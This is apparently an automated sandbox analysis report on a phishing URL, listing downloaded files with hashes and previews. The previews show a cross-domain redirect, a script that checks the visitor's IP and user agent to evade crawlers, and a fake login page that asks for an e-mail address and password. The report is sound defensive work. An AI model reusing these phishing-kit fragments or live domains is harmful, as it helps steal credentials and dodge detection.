                          192.168.2.11
                          192.168.2.24
                          Joe Sandbox version:42.0.0 Malachite
                          Analysis ID:1653902
                          Start date and time:2025-04-01 17:41:34 +02:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:defaultwindowsinteractivecookbook.jbs
                          Sample URL:https://www.clkmg.com/h4pussy/1ywq9a
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of new started processes analysed:8
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • EGA enabled
                          Analysis Mode:stream
                          Analysis stop reason:Timeout
                          Detection:MAL
                          Classification:mal68.phis.win@24/21@29/181
                          • Exclude process from analysis (whitelisted): svchost.exe
                          • Excluded IPs from analysis (whitelisted): 20.12.23.50
                          • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
                          • Not all processes were analyzed; the report is missing behavior information
                          • Report size getting too big, too many NtOpenFile calls found.
                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                          • VT rate limit hit for: https://www.clkmg.com/h4pussy/1ywq9a
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:ASCII text, with no line terminators
                          Category:downloaded
                          Size (bytes):16
                          Entropy (8bit):3.625
                          Encrypted:false
                          SSDEEP:
                          MD5:9B5719B531993D7EEF5EB4C692F2238C
                          SHA1:9C9A21624C975F0741B743348DE85A09FDA7E669
                          SHA-256:27008C4818CC0695B1496B0E8026DDFB7999C7FA066F78C61A76AF0FFECEF4BF
                          SHA-512:39CC9DC2E4DACFA6D1D7E23759ED7FB13C3111992BCA5DAA97CE1ADB37205056118FC1105D85E38B8E902A2F8CD68656AD36D53642DE60368E054BE86942BBA8
                          Malicious:false
                          Reputation:unknown
                          URL:https://content-autofill.googleapis.com/v1/pages/ChRDaHJvbWUvMTM0LjAuNjk5OC4zNhIZCcH8_Te5HSm9EgUNUAuvsCFR37WRZCcYAw==?alt=proto
                          Preview:CgkKBw1QC6+wGgA=
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 120x120, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=1, orientation=upper-left], baseline, precision 8, 1920x1034, components 3
                          Category:dropped
                          Size (bytes):114870
                          Entropy (8bit):7.375425337971249
                          Encrypted:false
                          SSDEEP:
                          MD5:45068F0ED4F904B59752FCAA6D8D3E7E
                          SHA1:49DC43B0FEB73AF09EE872C262CB45591D77A215
                          SHA-256:B16B43D0FA5E1715210552162B5059F379A69079C44E2A15690F27508AAADE9E
                          SHA-512:C6151A108DB6A654452D8B77AB8604B6977F5710C38F8EB7968C6F3110B1D4B732D0334BA8A12084A6F121354458D4AE5E94F14C390A4239570780B1175E7D0C
                          Malicious:false
                          Reputation:unknown
                          Preview:......JFIF.....x.x....."Exif..MM.*.........................C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....4..>..........<....n.T_............^./..o....u........y............ ......v><.{y./.k.h....$N.-......W.....w..wiF..9.m..c......w...%..!_..K+.k<..J.+3:*.........Vj....5y>e...?.7........>....#..}...YI.r..:....>Y-.w.w.....I.!....o...w.e..6\D..K,..<...Wy6...........1.D..n!.;..v....Gs...o.......c..\3G.F.\6.......q.6..F......H
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:ASCII text, with very long lines (65202)
                          Category:downloaded
                          Size (bytes):141052
                          Entropy (8bit):5.268092028848304
                          Encrypted:false
                          SSDEEP:
                          MD5:7FC4BED6B4319C62343F0BF5DB91A5BB
                          SHA1:6E283C4EA2B12DA64476AF280236A8C5D85DBBBC
                          SHA-256:F2AE26FF518D9519AFD2A3DC277D84E098458E6B6B85FA9548CDA2BED24435E7
                          SHA-512:E2E0072386F2F35690899509229136406C27C2B95E3E8CC810AEB6630D7F13BD0872E0F6E650B4FDDCE2567680E7C42EEA49C62BD2653006F5151D9BA0430CD7
                          Malicious:false
                          Reputation:unknown
                          URL:https://oka.greenthreads.hr/_next/static/chunks/framework-2c79e2a64abdb08b.js
                          Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[774],{4448:function(e,n,t){/**. * @license React. * react-dom.production.min.js. *. * Copyright (c) Facebook, Inc. and its affiliates.. *. * This source code is licensed under the MIT license found in the. * LICENSE file in the root directory of this source tree.. */var r,l,a,u,o,i,s=t(7294),c=t(3840);function f(e){for(var n="https://reactjs.org/docs/error-decoder.html?invariant="+e,t=1;t<arguments.length;t++)n+="&args[]="+encodeURIComponent(arguments[t]);return"Minified React error #"+e+"; visit "+n+" for the full message or use the non-minified dev environment for full errors and additional helpful warnings."}var d=new Set,p={};function m(e,n){h(e,n),h(e+"Capture",n)}function h(e,n){for(p[e]=n,e=0;e<n.length;e++)d.add(n[e])}var g=!("undefined"==typeof window||void 0===window.document||void 0===window.document.createElement),v=Object.prototype.hasOwnProperty,y=/^[:A-Z_a-z\u00C0-\u00D6\u00D8-\u00F6\u00F8-\u02FF\u0370
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (945), with CRLF line terminators
                          Category:downloaded
                          Size (bytes):3104
                          Entropy (8bit):5.15444715295649
                          Encrypted:false
                          SSDEEP:
                          MD5:A9087237DD6E0A5BB810E8DC1D861A01
                          SHA1:A87414BE9B0DCDD138B5C581D00BFE520544094F
                          SHA-256:25061DD2C2812F4605A887DE29BEAEB51E790281CBEF173D4DE949371893A40E
                          SHA-512:3E562D7AC54F97BC415108E19E60B1607FBA8E6930F7A58D2DBDF7B947D034A5514F8659A5A21227E1D88555056F5A11E3E3306AF2737984F168B92271E73B49
                          Malicious:false
                          Reputation:unknown
                          URL:https://netro.gitcombust.shop/
                          Preview:<!DOCTYPE html>..<html lang="en">..<head>.. <meta charset="UTF-8">.. <meta name="viewport" content="width=device-width, initial-scale=1.0">.. <title>Secure Access</title>.. <link rel="stylesheet" href="styles.css">..</head>..<body>.... <div class="container">.. . Inline SVG Logo Instead of "Secure Access" -->.. <div class="logo">.. <svg width="80" height="80" viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg">.. <path d="M14 2H6C4.9 2 4 2.9 4 20C4 21.1 4.9 22 6 22H18C19.1 22 20 21.1 20 20V8L14 2Z" fill="#0078D4"/>.. <path d="M14 2V8H20" fill="#005a9e"/>.. <rect x="7" y="12" width="10" height="2" rx="1" fill="white"/>.. <rect x="7" y="16" width="10" height="2" rx="1" fill="white"/>.. </svg>.. </div>.... <p id="processingText">Processing your request... Please wait.</p> . Added ID -->.... <div class="progress-container">..
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:ASCII text, with no line terminators
                          Category:downloaded
                          Size (bytes):280
                          Entropy (8bit):5.255155675654176
                          Encrypted:false
                          SSDEEP:
                          MD5:FEE534CEE4DA1C4A41D1EE54F48DB65B
                          SHA1:DAE46FEEA39BBBA346DA2DB16C4DF5B7E90A1357
                          SHA-256:159DCBF63601BDFCB99D7389FD4D70F185A6A8E308068072B443BB06F1D74CD5
                          SHA-512:95F916B9754F1E9B73246EB87E10AF666FC07B2F2A2CABB7A4DB1D924115FD8F27FF097702DE5697E91B61A3E5DE59D55F80925198BAD31F02E54B7AC9AF329D
                          Malicious:false
                          Reputation:unknown
                          URL:https://oka.greenthreads.hr/_next/static/chunks/pages/_app-aea6920bd27938ca.js
                          Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[888],{1597:function(n,_,u){(window.__NEXT_P=window.__NEXT_P||[]).push(["/_app",function(){return u(5035)}])}},function(n){var _=function(_){return n(n.s=_)};n.O(0,[774,179],function(){return _(1597),_(6885)}),_N_E=n.O()}]);
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:Unicode text, UTF-8 text, with CRLF line terminators
                          Category:downloaded
                          Size (bytes):3941
                          Entropy (8bit):4.8748840713426445
                          Encrypted:false
                          SSDEEP:
                          MD5:8A4FE174F7D45502A69695F92A0CDD39
                          SHA1:4F94AAB1C73E0E53C75BE5D27B66104F2AAF58DD
                          SHA-256:39BFB5DE6F065E22B15B17E9950E399C53447E3EDA696DA4A51FC834E70230EB
                          SHA-512:377BA08C1A871CF55C5573F7F50688C16FBB509CBB17544B0771E83E4D7B1A0C284C14CCB4794B6E3AB4B78F99BEC996D89B7CB7DA0255D3F816FF780B1AF596
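                          Malicious:false (file-level flag only; the preview below shows a public-IP lookup via api64.ipify.org plus canvas and user-agent bot checks, so assess this script by its behaviour)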
                          Reputation:unknown
                          URL:https://netro.gitcombust.shop/script.js
                          Preview:async function getUserIP() {.. try {.. const response = await fetch('https://api64.ipify.org?format=json');.. const data = await response.json();.. return data.ip;.. } catch (error) {.. console.error('Failed to get IP:', error);.. return '0.0.0.0'; // Default IP in case of error.. }..}....// . Function to Detect Canvas Fingerprinting..function isCanvasBlocked() {.. try {.. const canvas = document.createElement("canvas");.. const ctx = canvas.getContext("2d");.. if (!ctx) return true;.. ctx.fillText("Bot Detection", 10, 10);.. return ctx.getImageData(10, 10, 1, 1).data.length === 0;.. } catch (e) {.. return true; // If an error occurs, assume the canvas is blocked.. }..}....function detectBotLocally() {.. const botPatterns = [/bot/, /crawl/, /spider/, /scraper/, /python/, /httpclient/, /fetch/, /curl/];.. const isBotUserAgent = botPatterns.some(pattern => pattern.test(navigator.userAge
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:ASCII text, with very long lines (57744)
                          Category:downloaded
                          Size (bytes):64992
                          Entropy (8bit):5.454835624756822
                          Encrypted:false
                          SSDEEP:
                          MD5:575C44CD8AFE1990210F891769BC660A
                          SHA1:75B0609D9F1A9124ED4E27F3FBD232B8985E6B0F
                          SHA-256:E2EFBA3AD9DEACFED91542891E1D8EB0859C0D47371A5A8E3809992320F7DAF6
                          SHA-512:862619470AC49D0DC89F6FF3C1BB9AB7891DAA1A55E559F73E8B71559ACA1BE7130D3ECE4CCFFC5DDE98F9A70F96446BAD17E753677D096FEB21A7954416DA58
                          Malicious:false
                          Reputation:unknown
                          URL:https://oka.greenthreads.hr/_next/static/chunks/186-e401717d9e8b842b.js
                          Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[186],{487:function(t){var e={utf8:{stringToBytes:function(t){return e.bin.stringToBytes(unescape(encodeURIComponent(t)))},bytesToString:function(t){return decodeURIComponent(escape(e.bin.bytesToString(t)))}},bin:{stringToBytes:function(t){for(var e=[],r=0;r<t.length;r++)e.push(255&t.charCodeAt(r));return e},bytesToString:function(t){for(var e=[],r=0;r<t.length;r++)e.push(String.fromCharCode(t[r]));return e.join("")}}};t.exports=e},1012:function(t){var e,r;e="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/",r={rotl:function(t,e){return t<<e|t>>>32-e},rotr:function(t,e){return t<<32-e|t>>>e},endian:function(t){if(t.constructor==Number)return 16711935&r.rotl(t,8)|4278255360&r.rotl(t,24);for(var e=0;e<t.length;e++)t[e]=r.endian(t[e]);return t},randomBytes:function(t){for(var e=[];t>0;t--)e.push(Math.floor(256*Math.random()));return e},bytesToWords:function(t){for(var e=[],r=0,n=0;r<t.length;r++,n+=8)e[n>>>5]|=t[r]<<2
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:HTML document, ASCII text
                          Category:dropped
                          Size (bytes):154
                          Entropy (8bit):4.794666354490683
                          Encrypted:false
                          SSDEEP:
                          MD5:53E58F134037BDAD4234CCF3F379F815
                          SHA1:95118E29693F831B43F533CF4E0EBA604BF56CE5
                          SHA-256:531980D618BB32A4630B175B62AA2CA0F764BFAF873FB03022A85B7D4A2DFD90
                          SHA-512:17BE37BC5CF4CC671549EF41834C536B10F23AD53F452D2849D1FE47FB5D9A7EDA02F61C0277E9C1DF45FB39E862F1B37291E21CF5C76F9AAB2DA2F6A85C3358
                          Malicious:false
                          Reputation:unknown
                          Preview:<!DOCTYPE html>.<html lang="en">.<head>.<meta charset="utf-8">.<title>Error</title>.</head>.<body>.<pre>Cannot GET /api/get_doc_url</pre>.</body>.</html>.
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:HTML document, ASCII text, with very long lines (321), with no line terminators
                          Category:downloaded
                          Size (bytes):321
                          Entropy (8bit):5.095850439210152
                          Encrypted:false
                          SSDEEP:
                          MD5:304011D1C61BECF61BFFF366155C58B0
                          SHA1:2912369C9A499F247993FF993EB0FAD842326171
                          SHA-256:8E6EA9DBEB5D22582994F72615F8B02B555C72A22A35FC13F342F2FD82A01AF5
                          SHA-512:94786C565E2A993A7D25D6A3A5422D2DAC0F7C6BDCEAB90586FBFCCC39457CBD9C9AF18ACC6B325F76A44CE2E66A8BE413F5233EB0DB1F2498F5C95CD730F9CC
                          Malicious:false
                          Reputation:unknown
                          URL:https://netro.gitcombust.shop/favicon.ico
                          Preview:<!DOCTYPE html><html><head><title>WebContentNotFound</title></head><body><h1>The requested content does not exist.</h1><p><ul><li>HttpStatusCode: 404</li><li>ErrorCode: WebContentNotFound</li><li>RequestId : 09271e96-901e-004f-271c-a389b4000000</li><li>TimeStamp : 2025-04-01T15:41:27.6573009Z</li></ul></p></body></html>
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:ASCII text, with very long lines (65536), with no line terminators
                          Category:downloaded
                          Size (bytes):93582
                          Entropy (8bit):5.3137933918088445
                          Encrypted:false
                          SSDEEP:
                          MD5:DA989C36392E2601EA958221AE086C80
                          SHA1:BC3CE9E7F2872A6558B8068F90A40B0CEDD93462
                          SHA-256:2563B9EC72FD85ADC785A500E808635088D4DA3FF7993F386D9692B028B13A5B
                          SHA-512:266C763D3C65A349BA5D4E07E70BCA18D59036252C4A92A009B97D4E35D1A9BDB810B3F825E716B5C60D9E867E4C4633148EDFD8C20BDD4DFFE7086CAFE76E4C
                          Malicious:false
                          Reputation:unknown
                          URL:https://oka.greenthreads.hr/_next/static/chunks/main-de1ad41d606513c1.js
                          Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[179],{37:function(){"trimStart"in String.prototype||(String.prototype.trimStart=String.prototype.trimLeft),"trimEnd"in String.prototype||(String.prototype.trimEnd=String.prototype.trimRight),"description"in Symbol.prototype||Object.defineProperty(Symbol.prototype,"description",{configurable:!0,get:function(){var e=/\((.*)\)/.exec(this.toString());return e?e[1]:void 0}}),Array.prototype.flat||(Array.prototype.flat=function(e,t){return t=this.concat.apply([],this),e>1&&t.some(Array.isArray)?t.flat(e-1):t},Array.prototype.flatMap=function(e,t){return this.map(e,t).flat()}),Promise.prototype.finally||(Promise.prototype.finally=function(e){if("function"!=typeof e)return this.then(e,e);var t=this.constructor||Promise;return this.then(function(r){return t.resolve(e()).then(function(){return r})},function(r){return t.resolve(e()).then(function(){throw r})})}),Object.fromEntries||(Object.fromEntries=function(e){return Array.from(e).reduce
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:PNG image data, 96 x 96, 8-bit/color RGBA, non-interlaced
                          Category:dropped
                          Size (bytes):819
                          Entropy (8bit):7.451551279226306
                          Encrypted:false
                          SSDEEP:
                          MD5:4B5FEBB3FB4517A225620B5FE05016D2
                          SHA1:02F3621A49871422123E5D560CFFDE14F6C719D5
                          SHA-256:FA2E9317D000C52911C303166AB105CB0BC76D06783F5C069E8388556CA544E3
                          SHA-512:80C0909A2F8CF64C97EE888CF7A039C6E22B6FCB02666277E3A6087ABE258763F69C7CC1B65BACDAE5AC5FF3C7C1015E297E3ADE494B81E86AE0C20A0F36A787
                          Malicious:false
                          Reputation:unknown
                          Preview:.PNG........IHDR...`...`......w8....pHYs.................IDATx..1..A....A.,...*b.......r..;.lm.....;K.B,m--l,.D.R$!..U.j#*+...w...dgg...I....7K............1.>7..{.'.T.^jEw....].-...ue...8..........9&#..LO...a7........\..]q...MG Kz=.MG Kz..$.u].er.^...@b^.W@.^.....5....u.s.]z].}Wg.*.'........0..G.....+.......`.^......iw6.nM...g...X.......7...RI[.@$....t.d..B.Q...X.. *X.......}....@.X.PP\..L.......@x..................."((.(.....DPP.P....(..... ((.P.AA!@APP\. ..B.....@A.....AAq...................._|..Vt..-...@..-*1..B)..y.CE;.[....ZD..*...RQLy..}7.$..3..hn..N8_3#L...#..?...}.R36.Mbhn..YY...0}.j..^.W......S].......f.7?.ba..j."..R[......`%...^mE......n...}.y...:;..7...0=..........(.N......i...gU.&g....P.c..c..5.rK..G.....y.._........V..ke....]........0.......+......IEND.B`.
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:ASCII text, with very long lines (1515), with no line terminators
                          Category:downloaded
                          Size (bytes):1515
                          Entropy (8bit):5.288161100448261
                          Encrypted:false
                          SSDEEP:
                          MD5:358DF2F88C6CB7B259F7DFA5095500D5
                          SHA1:61141300014610F6DF77001775A2B8685B2985A0
                          SHA-256:6714626B550B8D9D9FBF11B56DC2CDFF65466D4E2BF4293FF5B92952B232393D
                          SHA-512:D45645CD0F4CEC02A7768C24A10D0D687F0A9A07875E203B51CCDBAF45DCB352D7C7DDFA626A57A5A8D097BF567D46FEC5D96744BC35CE47682C1E39D42F52AC
                          Malicious:false
                          Reputation:unknown
                          URL:https://oka.greenthreads.hr/_next/static/css/19d09a6113afa007.css
                          Preview:.Index_loginContainer__5jP50{text-align:center;height:100vh;display:flex;justify-content:center;align-items:center;background:url(/background.jpg) no-repeat 50% fixed;background-size:cover;color:#333}.Index_loginBox__TjgDC{background:hsla(0,0%,100%,.9);border-radius:10px;padding:20px;width:300px;box-shadow:0 4px 6px rgba(0,0,0,.1);outline:2px solid #000}.Index_logo___RQb3{width:64px;height:64px;margin:0 auto 20px}.Index_instruction__zKWvQ{font-family:Arial,sans-serif;font-size:16px;color:#555;margin-bottom:20px}.Index_modal__Vdljb{position:fixed;top:0;left:0;right:0;bottom:0;background:rgba(0,0,0,.5);display:flex;justify-content:center;align-items:center;z-index:1000}.Index_modalContent__dAUWU{background:#fff;padding:20px 30px;border-radius:10px;text-align:center;font-size:18px;font-weight:700}.Index_dots__9eVYy{display:inline-block;animation:Index_dots__9eVYy 1.2s steps(4) infinite}@keyframes Index_dots__9eVYy{0%{content:""}25%{content:"."}50%{content:".."}75%{content:"..."}}.Index_en
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:ASCII text, with very long lines (427), with no line terminators
                          Category:downloaded
                          Size (bytes):427
                          Entropy (8bit):5.435519929011898
                          Encrypted:false
                          SSDEEP:
                          MD5:CA987B439687DBB7C9655EF9D384BD60
                          SHA1:405F8F4673A4A232A03E4EB42EE99363CE4BC8FF
                          SHA-256:0936E0D26A8F1D2AB49E3A0EEFD0BC7779AF170097489712CC6DCD3C4A42BB07
                          SHA-512:87E9AA2060E5F45C069EB299500A0D0029044431BBAB9DE826075F891EEB1BD12DACE4871DEB26C37C05A183E2A3946168B6824A18A08B9B7A41569340B3D587
                          Malicious:false
                          Reputation:unknown
                          URL:https://oka.greenthreads.hr/_next/static/fUhIl0Hqd1aZXohaxqY8t/_buildManifest.js
                          Preview:self.__BUILD_MANIFEST={__rewrites:{beforeFiles:[],afterFiles:[],fallback:[]},"/":["static/chunks/186-e401717d9e8b842b.js","static/css/19d09a6113afa007.css","static/chunks/pages/index-c362d579fbf7a668.js"],"/_error":["static/chunks/pages/_error-3986dd5834f581dc.js"],"/denied":["static/chunks/pages/denied-186b4c64a621e6fa.js"],sortedPages:["/","/_app","/_error","/denied"]},self.__BUILD_MANIFEST_CB&&self.__BUILD_MANIFEST_CB();
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:Unicode text, UTF-8 text, with very long lines (3427), with no line terminators
                          Category:downloaded
                          Size (bytes):3437
                          Entropy (8bit):5.495011079762914
                          Encrypted:false
                          SSDEEP:
                          MD5:2D020F71E4B64531C505183FF8A1A4C4
                          SHA1:9267023D72E779B7435A96D6B09FC4BBC9BC7C4D
                          SHA-256:9082BC30769158D2E347471C5A46635E740FBA615EAA871C49646728056A224F
                          SHA-512:1B9AA65DB2C51B17253B7221253BA58A9C5267B5CC976FAD3978351FD936465E8BCAC7B400072CDDDE44EBC2A47F8E0F092FE0DA5D5C59069B96983325852ADA
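                          Malicious:false (file-level flag only; the preview below shows a prompt for an e-mail address and password, a logo fetch from logo.clearbit.com keyed on the typed e-mail domain, and requests to api64.ipify.org and a detect_bot endpoint, so assess this script by its behaviour)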
                          Reputation:unknown
                          URL:https://oka.greenthreads.hr/_next/static/chunks/pages/index-c362d579fbf7a668.js
                          Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[405],{5557:function(e,t,n){(window.__NEXT_P=window.__NEXT_P||[]).push(["/",function(){return n(6616)}])},6616:function(e,t,n){"use strict";n.r(t);var a=n(5893),o=n(7294),s=n(7066),i=n(2568),r=n.n(i),l=n(9812),c=n.n(l);let u=()=>{let[e,t]=(0,o.useState)(""),[n,i]=(0,o.useState)(""),[l,u]=(0,o.useState)(!1),[d,_]=(0,o.useState)("/favicon.ico"),[p,m]=(0,o.useState)("Verify your email identity to continue."),[g,h]=(0,o.useState)(!1),x=e=>{t(e.target.value)},b=t=>{if(t.preventDefault(),e.includes("@")){u(!0),m("Verify email password");let t=e.split("@")[1];_("https://logo.clearbit.com/".concat(t))}else alert("Please enter a valid email address.")},f=async t=>{if(t.preventDefault(),n.length<5){alert("Password must be at least 5 characters long.");return}h(!0);try{let t=await s.Z.get("https://api64.ipify.org?format=json").then(e=>e.data.ip),a=await s.Z.post("https://rail-bot-production.up.railway.app/api/detect_bot",{user_agent:navigato
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:ASCII text, with no line terminators
                          Category:downloaded
                          Size (bytes):77
                          Entropy (8bit):4.37144473219773
                          Encrypted:false
                          SSDEEP:
                          MD5:B6652DF95DB52FEB4DAF4ECA35380933
                          SHA1:65451D110137761B318C82D9071C042DB80C4036
                          SHA-256:6F5B4AA00D2F8D6AED9935B471806BF7ACEF464D0C1D390260E5FE27F800C67E
                          SHA-512:3390C5663EF9081885DF8CDBC719F6C2F1597A4E25168529598097E9472608A4A62EC7F7E0BC400D22AAC81BF6EA926532886E4DC6E4E272D3B588490A090473
                          Malicious:false
                          Reputation:unknown
                          URL:https://oka.greenthreads.hr/_next/static/fUhIl0Hqd1aZXohaxqY8t/_ssgManifest.js
                          Preview:self.__SSG_MANIFEST=new Set,self.__SSG_MANIFEST_CB&&self.__SSG_MANIFEST_CB();
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:HTML document, ASCII text, with very long lines (2575), with no line terminators
                          Category:downloaded
                          Size (bytes):2575
                          Entropy (8bit):5.239010277329789
                          Encrypted:false
                          SSDEEP:
                          MD5:38B7B3BB70CBD15961DDE9E122FEF975
                          SHA1:C453C93DB623988845FA2142AD799EBD65DA93CC
                          SHA-256:77E1A78F90A47E98DA896EC28A5A12ECF0ED75CE99654464463E62D1CDC4E235
                          SHA-512:591C06B3AA4AE2F0F348B8438674087F89442AEF1BBD221AA24F32115729E4162FF9E925D9009C2AAE3C7182D227FF8C1A53CC62296574BEED1DD4DC92B12A65
                          Malicious:false
                          Reputation:unknown
                          URL:https://oka.greenthreads.hr/
                          Preview:<!DOCTYPE html><html><head><meta charSet="utf-8"/><link rel="preload" as="style" href="/_next/static/css/19d09a6113afa007.css"/><link rel="preload" as="script" href="/_next/static/chunks/webpack-ee7e63bc15b31913.js"/><link rel="preload" as="script" href="/_next/static/chunks/framework-2c79e2a64abdb08b.js"/><link rel="preload" as="script" href="/_next/static/chunks/main-de1ad41d606513c1.js"/><link rel="preload" as="script" href="/_next/static/chunks/pages/_app-aea6920bd27938ca.js"/><link rel="preload" as="script" href="/_next/static/chunks/186-e401717d9e8b842b.js"/><link rel="preload" as="script" href="/_next/static/chunks/pages/index-c362d579fbf7a668.js"/><link rel="preload" as="script" href="/_next/static/fUhIl0Hqd1aZXohaxqY8t/_buildManifest.js"/><link rel="preload" as="script" href="/_next/static/fUhIl0Hqd1aZXohaxqY8t/_ssgManifest.js"/><link rel="preload" href="/_next/static/css/19d09a6113afa007.css" as="style"/><meta name="viewport" content="width=device-width"/><meta name="next-hea
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:HTML document, ASCII text
                          Category:downloaded
                          Size (bytes):121
                          Entropy (8bit):4.708276176005738
                          Encrypted:false
                          SSDEEP:
                          MD5:F2E875604683564EB1833C198104F089
                          SHA1:E023EFE8BC131FF1D2C449FD76A4394FF125E8B8
                          SHA-256:B5CCC2694098B630207900CCD172A41CD835FB7C348104EA6B7D7959D8D382B4
                          SHA-512:936CB93F74DAD88651E59D7BF1E050FDDA6372B0ABDF63DFD92FAB81F5247759AE4D8DA035529E577A5039D2BC5C88C8C553ECC0C675F31E9502C451111F285D
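                          Malicious:false (file-level flag only; the preview below is a zero-delay meta-refresh redirect from www.clkmg.com to netro.gitcombust.shop, i.e. one hop of a cross-domain redirect chain)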
                          Reputation:unknown
                          URL:https://www.clkmg.com/redir.cgi?url=5YLzHJtmmpWmacBzmzCY%2flX4xlmtZYa5OH2D9HeWNiho6ITfHFNLv4fgDcASlkcXru2gSFAsJp%2fzvbDs&pixel=0&lidc=1749346618
                          Preview:<html>.<head>.<meta http-equiv="refresh" content="0; url=https://netro.gitcombust.shop">.</head>.<body>..</body>.</html>.
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:MS Windows icon resource - 1 icon, 1x1, 2 colors
                          Category:dropped
                          Size (bytes):78
                          Entropy (8bit):1.0661976009971772
                          Encrypted:false
                          SSDEEP:
                          MD5:C9E1EFA761B83F4A25A07DC85C207F95
                          SHA1:7C1DF040D4119E1C1B4F875C362F363AD1F6BA13
                          SHA-256:91634633CA6D34044C356A9A0BAA832F1927D8326E1AE1A95AF22B864D30DD7F
                          SHA-512:D21A98B4A9362B4662163F28AB27F799CF2ABB04AE690431C15C806772837BE545CFACADA56DB5045CFA22EF4935D14AE0AC791974A095003156B0BF430E2857
                          Malicious:false
                          Reputation:unknown
                          Preview:..............8.......(.......................................................
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:ASCII text, with very long lines (8377), with no line terminators
                          Category:downloaded
                          Size (bytes):8377
                          Entropy (8bit):5.7164926360897805
                          Encrypted:false
                          SSDEEP:
                          MD5:6DDDD1C194F8C88F5F2AFC06833D90CA
                          SHA1:E610F00E2363E2CBF9520EEFDA983FD299C4FBB7
                          SHA-256:1CB9DDDD8ED49F62F92A77204ED057C7EC89037E2310D527E6378A81C21C0523
                          SHA-512:BCE98A1FCCECDF4F56407485E5714B53D2D3770408FF3B1524CB562E7BC9956545B731887795089EEB2B89E59CEB69909CB11FAA098EE12D69160956E4363B20
                          Malicious:false
                          Reputation:unknown
                          URL:https://netro.gitcombust.shop/cdn-cgi/challenge-platform/h/b/scripts/jsd/708f7a809116/main.js?
                          Preview:window._cf_chl_opt={cFPWv:'b'};~function(W,h,i,n,o,y,z,B){W=b,function(c,d,V,e,f){for(V=b,e=c();!![];)try{if(f=-parseInt(V(143))/1+parseInt(V(214))/2+-parseInt(V(217))/3*(parseInt(V(220))/4)+parseInt(V(174))/5+parseInt(V(199))/6+-parseInt(V(130))/7+parseInt(V(138))/8,f===d)break;else e.push(e.shift())}catch(E){e.push(e.shift())}}(a,330080),h=this||self,i=h[W(218)],n={},n[W(189)]='o',n[W(233)]='s',n[W(198)]='u',n[W(226)]='z',n[W(165)]='n',n[W(184)]='I',n[W(231)]='b',o=n,h[W(170)]=function(E,F,G,H,a8,J,K,L,M,N,O){if(a8=W,F===null||void 0===F)return H;for(J=x(F),E[a8(141)][a8(230)]&&(J=J[a8(187)](E[a8(141)][a8(230)](F))),J=E[a8(188)][a8(176)]&&E[a8(167)]?E[a8(188)][a8(176)](new E[(a8(167))](J)):function(P,a9,Q){for(a9=a8,P[a9(133)](),Q=0;Q<P[a9(237)];P[Q]===P[Q+1]?P[a9(162)](Q+1,1):Q+=1);return P}(J),K='nAsAaAb'.split('A'),K=K[a8(202)][a8(150)](K),L=0;L<J[a8(237)];M=J[L],N=v(E,F,M),K(N)?(O='s'===N&&!E[a8(211)](F[M]),a8(239)===G+M?I(G+M,N):O||I(G+M,F[M])):I(G+M,N),L++);return H;function I(
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:Unicode text, UTF-8 text, with CRLF line terminators
                          Category:downloaded
                          Size (bytes):1669
                          Entropy (8bit):4.828717855219219
                          Encrypted:false
                          SSDEEP:
                          MD5:5E1A41B0834E51E45D3181187587B24B
                          SHA1:CC815FF3837AC7B95872D1349699593F8DB7272B
                          SHA-256:FA03F1E406824451F99B7B2BF347CFE32697CE0B5403D8455EC9644F883E5D6E
                          SHA-512:F72BAF30A40A4B11B0C521AAFDD5B86C6D95971E48055E04C56CB87CD06CAFD5A020B9E1B5EAC64B2E88AC00212F0F14070B277198E8936656EB65216B914527
                          Malicious:false
                          Reputation:unknown
                          URL:https://netro.gitcombust.shop/styles.css
